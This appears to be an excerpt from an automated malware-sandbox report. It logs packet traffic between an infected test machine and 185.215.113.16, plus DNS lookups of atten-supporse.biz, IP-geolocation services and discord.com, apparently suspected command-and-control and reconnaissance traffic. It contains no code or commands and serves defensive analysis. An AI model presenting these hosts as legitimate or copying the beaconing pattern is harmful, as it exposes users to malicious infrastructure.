Dec 10, 2024 11:11:45.077914953 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.078037024 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.078043938 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.078075886 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.079175949 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.079226971 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.079267979 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.079323053 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.080142021 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.080192089 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.080250978 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.080292940 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.081445932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.081501007 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.081576109 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.081619978 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.082417011 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.082467079 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.082541943 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.082588911 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.083503962 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.083556890 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.083590984 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.083632946 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.084642887 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.084698915 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.084708929 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.084745884 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.085711956 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.085772038 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.085789919 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.085845947 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.086828947 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.086879015 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.086893082 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.087038040 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.087995052 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.088099003 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.088105917 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.088145018 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.089066029 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.089178085 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.089191914 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.089251041 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.090200901 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.090253115 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.090301037 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.090384960 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.091306925 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.091356993 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.091406107 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.091458082 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.092442036 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.092485905 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.092528105 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.092573881 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.093555927 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.093605995 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.093673944 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.093713045 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.094755888 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.094805956 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.094867945 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.094916105 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.095803022 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.095915079 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.095926046 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.096160889 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.096951962 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.096996069 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.097048998 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.097217083 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.098058939 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.098086119 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.098109007 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.098120928 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.099178076 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.099231958 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.099360943 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.099807024 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.100513935 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.100569963 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.100574970 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.100605965 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.101423025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.101479053 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.101737976 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.101784945 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.102485895 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.102533102 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.102591038 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.102636099 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.103969097 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.104026079 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.104068995 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.104114056 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.104785919 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.104841948 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.104969025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.105015993 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.105849028 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.105901003 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.105925083 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.105962038 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.106954098 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.107007980 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.107074976 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.107120037 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.108268976 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.108328104 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.108341932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.108380079 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.109214067 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.109321117 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.109369993 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.109416962 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.110323906 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.110402107 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.110440969 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.110511065 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.167345047 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:45.224463940 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.224564075 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.224644899 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.225028992 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.225069046 CET	80	49937	185.215.113.16	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 11:11:22.635229111 CET	192.168.2.5	1.1.1.1	0xc88b	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:45.545681000 CET	192.168.2.5	1.1.1.1	0x4b66	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:46.944551945 CET	192.168.2.5	1.1.1.1	0xf3da	Standard query (0)	246.229.1.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Dec 10, 2024 11:11:48.128829002 CET	192.168.2.5	1.1.1.1	0xc5c5	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.136791945 CET	192.168.2.5	1.1.1.1	0xf541	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.217511892 CET	192.168.2.5	1.1.1.1	0x34e4	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.287173033 CET	192.168.2.5	1.1.1.1	0x80d9	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:48.447783947 CET	192.168.2.5	1.1.1.1	0xf0fc	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.448272943 CET	192.168.2.5	1.1.1.1	0xbbc2	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.462946892 CET	192.168.2.5	1.1.1.1	0x46c2	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.529622078 CET	192.168.2.5	1.1.1.1	0x40ea	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.529992104 CET	192.168.2.5	1.1.1.1	0xa88e	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.584947109 CET	192.168.2.5	1.1.1.1	0xbfaf	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.593197107 CET	192.168.2.5	1.1.1.1	0xd67f	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.626928091 CET	192.168.2.5	1.1.1.1	0xb07d	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.627141953 CET	192.168.2.5	1.1.1.1	0x2861	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.627294064 CET	192.168.2.5	1.1.1.1	0x4651	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.779618979 CET	192.168.2.5	1.1.1.1	0xe933	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:48.779758930 CET	192.168.2.5	1.1.1.1	0xfc0f	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:48.779898882 CET	192.168.2.5	1.1.1.1	0x2fa3	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 10, 2024 11:11:48.989471912 CET	192.168.2.5	1.1.1.1	0x8677	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.989960909 CET	192.168.2.5	1.1.1.1	0x6751	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.079438925 CET	192.168.2.5	1.1.1.1	0xcfa3	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.262562037 CET	192.168.2.5	1.1.1.1	0xef10	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:49.693172932 CET	192.168.2.5	1.1.1.1	0x3f71	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.693526030 CET	192.168.2.5	1.1.1.1	0x817b	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.734242916 CET	192.168.2.5	1.1.1.1	0x4e36	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.811050892 CET	192.168.2.5	1.1.1.1	0x546d	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.997462988 CET	192.168.2.5	1.1.1.1	0x6751	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.997484922 CET	192.168.2.5	1.1.1.1	0x8677	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:49.998212099 CET	192.168.2.5	1.1.1.1	0x5d52	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:50.145057917 CET	192.168.2.5	1.1.1.1	0x80b4	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:50.176704884 CET	192.168.2.5	1.1.1.1	0x39e2	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:11:50.177299976 CET	192.168.2.5	1.1.1.1	0xf379	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:50.372620106 CET	192.168.2.5	1.1.1.1	0x8bde	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:11:50.375255108 CET	192.168.2.5	1.1.1.1	0x6b7e	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:50.521344900 CET	192.168.2.5	1.1.1.1	0x7674	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:11:52.075459957 CET	192.168.2.5	1.1.1.1	0xb479	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.075696945 CET	192.168.2.5	1.1.1.1	0xbfef	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.075880051 CET	192.168.2.5	1.1.1.1	0xf347	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.228189945 CET	192.168.2.5	1.1.1.1	0x3670	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.360145092 CET	192.168.2.5	1.1.1.1	0x442d	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.360526085 CET	192.168.2.5	1.1.1.1	0xf5e0	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.374253988 CET	192.168.2.5	1.1.1.1	0xdfd0	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Dec 10, 2024 11:11:52.502835989 CET	192.168.2.5	1.1.1.1	0xb5a5	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Dec 10, 2024 11:11:52.503304005 CET	192.168.2.5	1.1.1.1	0xb0bb	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 10, 2024 11:11:52.516813993 CET	192.168.2.5	1.1.1.1	0x4650	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.709642887 CET	192.168.2.5	1.1.1.1	0x7c90	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.709894896 CET	192.168.2.5	1.1.1.1	0x3153	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.710334063 CET	192.168.2.5	1.1.1.1	0x6dde	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.858527899 CET	192.168.2.5	1.1.1.1	0x632e	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.859147072 CET	192.168.2.5	1.1.1.1	0x9395	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:52.919317007 CET	192.168.2.5	1.1.1.1	0xe026	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:52.996136904 CET	192.168.2.5	1.1.1.1	0x5b4e	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 10, 2024 11:11:53.000232935 CET	192.168.2.5	1.1.1.1	0x5f7d	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:11:53.833272934 CET	192.168.2.5	1.1.1.1	0x5ed	Standard query (0)	246.229.1.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Dec 10, 2024 11:11:54.399079084 CET	192.168.2.5	1.1.1.1	0x5174	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:54.665527105 CET	192.168.2.5	1.1.1.1	0x5174	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:55.025194883 CET	192.168.2.5	1.1.1.1	0x5159	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:01.277831078 CET	192.168.2.5	1.1.1.1	0x2fc8	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:04.123153925 CET	192.168.2.5	1.1.1.1	0xd637	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:12:04.334115028 CET	192.168.2.5	1.1.1.1	0x8362	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:04.357251883 CET	192.168.2.5	1.1.1.1	0x3468	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:12:04.370505095 CET	192.168.2.5	1.1.1.1	0xe712	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:12:04.511642933 CET	192.168.2.5	1.1.1.1	0xd9bc	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:04.642905951 CET	192.168.2.5	1.1.1.1	0x3e2e	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:12:05.612004995 CET	192.168.2.5	1.1.1.1	0xc6ec	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:08.138139009 CET	192.168.2.5	1.1.1.1	0x2d79	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:12:08.196235895 CET	192.168.2.5	1.1.1.1	0xb6b3	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:08.196367025 CET	192.168.2.5	1.1.1.1	0x2d60	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Dec 10, 2024 11:12:08.280445099 CET	192.168.2.5	1.1.1.1	0xb9b6	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:08.484045029 CET	192.168.2.5	1.1.1.1	0xb6b3	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:08.510860920 CET	192.168.2.5	1.1.1.1	0x432c	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 10, 2024 11:12:08.759828091 CET	192.168.2.5	1.1.1.1	0x432c	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 10, 2024 11:12:10.746573925 CET	192.168.2.5	1.1.1.1	0xd401	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:22.684943914 CET	192.168.2.5	1.1.1.1	0x6ab1	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:24.010826111 CET	192.168.2.5	1.1.1.1	0x6e4d	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.731507063 CET	192.168.2.5	1.1.1.1	0x3369	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 11:12:33.747329950 CET	192.168.2.5	1.1.1.1	0x6d26	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.797349930 CET	192.168.2.5	1.1.1.1	0x1131	Standard query (0)	normandy.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.938108921 CET	192.168.2.5	1.1.1.1	0xd38b	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:33.946127892 CET	192.168.2.5	1.1.1.1	0xa29c	Standard query (0)	normandy-cdn.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:34.127641916 CET	192.168.2.5	1.1.1.1	0x9726	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Dec 10, 2024 11:12:34.139574051 CET	192.168.2.5	1.1.1.1	0xc03b	Standard query (0)	normandy-cdn.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 11:12:34.959042072 CET	192.168.2.5	1.1.1.1	0x3507	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:12:35.213819981 CET	192.168.2.5	1.1.1.1	0x3507	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 11:11:22.957020998 CET	1.1.1.1	192.168.2.5	0xc88b	No error (0)	atten-supporse.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:22.957020998 CET	1.1.1.1	192.168.2.5	0xc88b	No error (0)	atten-supporse.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:22.957020998 CET	1.1.1.1	192.168.2.5	0xc88b	No error (0)	atten-supporse.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:22.957020998 CET	1.1.1.1	192.168.2.5	0xc88b	No error (0)	atten-supporse.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:22.957020998 CET	1.1.1.1	192.168.2.5	0xc88b	No error (0)	atten-supporse.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:22.957020998 CET	1.1.1.1	192.168.2.5	0xc88b	No error (0)	atten-supporse.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:22.957020998 CET	1.1.1.1	192.168.2.5	0xc88b	No error (0)	atten-supporse.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:45.682779074 CET	1.1.1.1	192.168.2.5	0x4b66	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:45.682779074 CET	1.1.1.1	192.168.2.5	0x4b66	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:47.089946985 CET	1.1.1.1	192.168.2.5	0xf3da	Name error (3)	246.229.1.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Dec 10, 2024 11:11:48.129105091 CET	1.1.1.1	192.168.2.5	0x77cd	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.270545006 CET	1.1.1.1	192.168.2.5	0xc5c5	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.282150030 CET	1.1.1.1	192.168.2.5	0xf541	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.355794907 CET	1.1.1.1	192.168.2.5	0x34e4	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:48.355794907 CET	1.1.1.1	192.168.2.5	0x34e4	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.588287115 CET	1.1.1.1	192.168.2.5	0xf0fc	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.589160919 CET	1.1.1.1	192.168.2.5	0xbbc2	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.605792046 CET	1.1.1.1	192.168.2.5	0x46c2	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:48.605792046 CET	1.1.1.1	192.168.2.5	0x46c2	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.614073038 CET	1.1.1.1	192.168.2.5	0x7907	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 11:11:48.614073038 CET	1.1.1.1	192.168.2.5	0x7907	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 11:11:48.674967051 CET	1.1.1.1	192.168.2.5	0x40ea	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
